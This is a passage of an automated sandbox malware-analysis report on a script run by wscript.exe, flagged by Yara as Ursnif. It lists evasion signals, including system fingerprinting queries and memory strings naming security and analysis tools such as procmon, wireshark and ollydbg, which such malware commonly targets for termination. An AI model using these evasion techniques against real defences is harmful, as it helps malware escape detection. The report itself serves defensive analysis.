Source: wscript.exe, 00000000.00000002.254267241.0000020541BD9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: magnesia.xcodeproj.0.dr Jump to dropped file

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY